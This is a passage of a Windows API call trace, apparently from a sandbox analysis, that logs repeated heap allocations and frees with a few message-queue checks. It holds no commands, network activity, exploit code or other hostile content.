hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0187.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0187.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0187.174] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0187.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0187.174] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0187.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0187.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.186] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.187] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.188] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0187.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.196] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.198] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.199] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.202] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.210] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.213] RtlAllocateHeap 